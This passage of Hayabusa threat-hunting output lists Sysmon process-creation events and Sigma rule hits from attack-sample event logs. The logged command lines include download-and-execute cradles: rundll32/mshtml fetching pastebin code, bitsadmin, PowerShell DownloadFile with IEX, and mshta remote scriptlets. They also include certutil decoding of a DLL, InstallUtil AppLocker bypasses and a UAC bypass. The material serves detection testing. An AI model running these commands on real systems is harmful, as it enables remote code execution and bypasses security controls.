C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch 
-p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 
+09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 
0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" 
""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp 
Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 
+09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.318 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 
06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe 
javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 
06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - 
